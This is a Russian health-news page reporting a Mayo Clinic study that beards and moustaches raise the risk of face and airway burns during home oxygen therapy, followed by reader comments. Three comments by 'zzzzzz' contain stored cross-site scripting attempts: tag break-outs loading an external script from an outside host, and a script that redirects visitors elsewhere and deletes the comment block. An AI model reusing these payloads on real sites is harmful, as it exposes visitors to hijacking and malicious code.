Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Женщины, осторожно! Мужчи...  >>  Женщины, осторожно! Мужчины с усами могут сжечь ваш дом!
 
Обратная связь
 

Женщины, осторожно! Мужчины с усами могут сжечь ваш дом!

Размер шрифта
26 марта 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, борода и усы очень пожароопасны. Ученые выяснили, что они значительно повышают риск возникновения ожогов лица и дыхательных путей у людей, которые находятся на кислородной терапии.

Женщины, осторожно! Мужчины с усами могут сжечь ваш дом!

Ученые провели эксперимент с использованием двух манекенов: у одного из них были усы, сделанные из человеческих волос, а у другого волос на лице не было. Обоим манекенам были введены носовые трубки (стандартно используемые при кислородной терапии), которые затем были подключены к баллону с кислородом. Поток кислорода составил два литра в минуту – уровень, обычно используемый при проведении терапии в домашних условиях. Когда возле манекенов было выпущено несколько искр, кислородные трубки манекена с усами загорелись, пламя охватило и усы, и лицо. Второй манекен не загорелся и остался цел.

В клинике Мейо также были проанализированы клинические данные пациентов, проходивших кислородную терапию дома. Девять пациентов проходили лечение от ожогов в связи с несчастными случаями во время этой терапии, причем у восьми из них были усы или борода. «У таких пациентов мы диагностируем тяжелые ожоги лица и дыхательных путей», – рассказывает доктор Эндрю Гринланд, ведущий автор исследования. «Причем ожоги дыхательных путей могут быть опасны для жизни». Результаты этой работы были опубликованы в журнале Mayo Clinic Proceedings.

Более миллиона американцев проходят кислородную терапию, поэтому для врачей очень важно предупредить их о возможном риске, связанном с растительностью на лице. Причиной возгорания может послужить обычная спичка или сигарета.

Однако риск возгорания можно свести к минимуму, достаточно лишь следовать простым рекомендациям врачей: сбрить по возможности бороду и усы, а также использовать гели для укладки волос на водной основе (без добавления спирта и масел), применять увлажненный кислород и избегать открытого огня.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

27 мая 2015 в 00:04

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:21

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:16

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Вы уверены, что вы дома одни? Как найти и избавиться от клопов дома, в кафе и на работе!   Грецкие орехи улучшают качество спермы   Как почистить унитаз. Супернеобычные способы   Чем вытереться, если нет туалетной бумаги?  
22 февраля 2013Настоящий мужчина всегда говорит правду 09 ноября 2012Кастрация продлевает жизнь
 
14 сентября 2012Антипригарное покрытие сделает вашего ребенка толстым! 12 сентября 2012Обрезание снижает риск развития инфекций!
 

Слайдшоу

1
Необычное использование пластиковых стаканов
5 мест, которые надо мыть, если не хотите болеть весь год
Кто живет в вашей постели?!

Тесты

1
Яички – удивительный орган
Здорова ли ваша предстательная железа
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.